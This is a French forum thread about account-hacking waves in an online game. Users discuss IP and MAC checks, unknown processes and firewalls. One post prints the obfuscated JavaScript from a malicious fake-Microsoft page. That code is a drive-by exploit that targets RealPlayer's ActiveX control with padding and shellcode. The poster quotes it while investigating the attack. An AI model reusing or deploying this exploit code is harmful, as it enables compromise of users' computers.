|
Oui c'est des bonnes idées, SE a une myriades d'outils a sa disposition pour empêcher ce qui arrive et palier aux erreurs des utilisateurs. On peut ajouter une vérification de l'adresse IP (même FFXIah.com le fait !), voir en allant plus loin, coupler vérification de l'adresse MAC + adresse IP (SEGA le fait pour détecter les tricheurs s'étant fait ban avant). Il sera bien difficile pour un "hacker" de : prendre notre adresse IP + notre adresse MAC (même si cette dernière se change "assez facilement")... Restera plus que les méthodes types trojans/contrôle a distance pour "piller" un compte. Il faudra que le voleur utilise notre machine en temps réelle, çà réduit fortement les risques. C'est à cause du pr0n çà ![]() |
![]() |
|
Aller à la page... |
[Fusion] La vague de Hacking.
Suivre Répondre |
|
Partager | Rechercher |
|
|
![]() |
|
|
Citation :
Thanks pour l'info ![]() Edit : remarque suis bête suffisait de vérifier la source de la page hxxp://www.miorsocft.com/help/help.htm. Code:
<script language=javascript> eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString (36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function() {return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('V v(){W l=p.U.o();3 (l.e("r 6")==-1&&l.e("r 7")==-1)g;3(l.e("Q 5.")==-1)g;s="R"+"X.I"+"Y"+"17.1";16{n=15 Z(s)}18(M){g}b=n.D("E");2="";h=d("%C%z% A%u");j(i=0;i<F*G;i++)2+="S";3(b.e("6.0.14.")==-1){3(p.t.o()=="N-L")a=d("%K%H%f");8 3(p.t.o()=="19-13")a=d("%1b%1q%1p%f");8 g}8 3(b=="6.0.14.1s")a=d("%m%11%1n%f");8 3(b=="6.0.14.1r")a=d("%m%11%u%f");8 3(b=="6.0.14.1t")a=d("%w%q%1u%f");8 3 (b=="6.0.14.1o")a=d("%w%q%1d%f");8 3(b=="6.0.14.1a")a=d("%1f%11%1g%m");8 g;3(b.e("6.0.10.")!=-1){j(i=0;i<4;i++)2=2+h;2=2+a}8 3(b.e("6.0.11.")!=-1){j(i=0;i<6;i++)2=2+h;2=2+a}8 3(b.e("6.0.12.")!=-1){j(i=0;i<9;i++)2=2+h;2=2+a}8 3(b.e("6.0.14.")!=-1){j (i=0;i<10;i++)2=2+h;2=2+a}y="1h\\\\1i";x="1j";k=2+y+x;1k(k.1m<1c)k+="1e";n.1l("c:\\\\B O\\\\J\\\\P.T",k,"",0,0)}v ();',62,93,'||Padding|if|||||else||ret|RealVersion||unescape|indexOf|60|return|JmpOver||for|PayLoad|user|63|Real|toLowerCase| navigator|31|msie|VulObject|userLanguage|04|RealExploit|79|Shell|AdjESP|06|74|Program|75|PlayerProperty|PRODUCTVERSION|32|148 |a5||NetMeeting|7f|cn|error|zh|Files|TestSnd|nt|IER||wav|userAgent|function|var|PCtl|ERP|ActiveXObject||||us||new|try|Ctl|cat ch|en|536|4f|0x8000|09|YuanGe|51|70|LLLL|XXXXXLD|TYXXXXfiAqcYfPAAeiAoHFXZPiAkjbrIPiAgVbaaPiAckwzOPLiAsloUWPiAZczabPiAVqKpAPiA RCpDXPQlaaTbaaaLtUAAAACFiaaPoHHmDahivabowabXknENIjdpPPPPpUovdzAsPpPPpPPhktpplXKwpqlzmhKVHPxXKoGfZPtuYNhDtppPpPpNBoYfXfofNPPPp FhGEgBvLFmetOoafXKNxnhBnPpPpPPHCnLRPXKmlVJrpucoOefPDlgptpSUlVqRNVeLGddpcPDGxfuppPPCslPepuPeCEWEpOOUfQphkMLupESOouVpXOoUFplEQu FhkGECLXkwTRnwxpsOEefHKgVRpPSOecClydYdqzMPsleCsMkpokNQpCJMfgtPxLALKpMPcmZTPNKoqcKaOGeNWENXkUNBTPCMmfVXKPLdKxkuNqLPSmMXkPDhKPc lejKEneyLsNXEGOOOOOohnTNPnNLlaWiNuKxYHonXZpNgnMhnRgscVQjbOgpFxWdwTgPSjrOBOgGWwgwrNvMvIVOwBWSVoFcffGDrNVcfovMrOFxVeFlwPrOGegpv dfQwDfErNFuGhfUpp|while|Import|length|08|543|a4|71|550|544|552|01'.split('|'),0,{})) </script> |
![]() |
|
|
C'est une idée en l'air, hein, j'ignore comme ça fonctionne, si c'est techniquement possible, si ça un réel avantage autre que de rendre la tentative de hack plus pénible, etc. ^^
|
![]() |
|
|
Merci, Cdryik.
|
![]() |
|
|
|
![]() |
|
Boule de poils |
Trouver plus de messages par Boule de poils |
|
Citation :
|
![]() |
|
|
Pour ALCMTR.EXE, as tu une carte Realtek ?
Apparement c'est un processus qui est installé quand t'installes une carte son Realtek. Pour rdihost, t'as un topic qui en parle là: http://forum.telecharger.01net.com/t...essages-1.html |
![]() |
|
|
Pour ALCMTR, regarde le lien ci-dessous
http://forum.telecharger.01net.com/t...essages-1.html Pour l'autre, je dirais que c'est pas grave, mais bon, demande l'avis d'un expert ![]() les experts Las vegas par exemple... ![]() |
![]() |
|
Héros / Héroïne
|
|
![]() |
Héros / Héroïne
|
ah ben selon ce topic c'est dangereux finalement lol
|
![]() |
|
|
Bah il faut aller dans tes paramètres et activer le pare-feu de Windows (Paramètres > Panneau de configuration > Pare-feu Windows) , au moins :]
Sinon, tu peux essayer la version gratuite de ZoneAlarm, il tourne assez bien. |
![]() |
|
Boule de poils |
Trouver plus de messages par Boule de poils |
|
Citation :
![]() ![]() |
![]() |
|
|
|
![]() |
|
|
qd je fais Paramètres > Panneau de configuration > Pare-feu Windows, il n'y a pas Pare-feu Windows
![]() |
![]() |
|
|
J'ai jamais eu de firewall avec la version d'XP que j'utilise, et j'ai envie de dire tant mieux. J'utilise zone alarm et ça a l'air de marcher assez bien.
|
![]() |
|
Suivre Répondre |
Fil d'ariane
Connectés sur ce fil1 connecté (0 membre et 1 invité)
Afficher la liste détaillée des connectés
|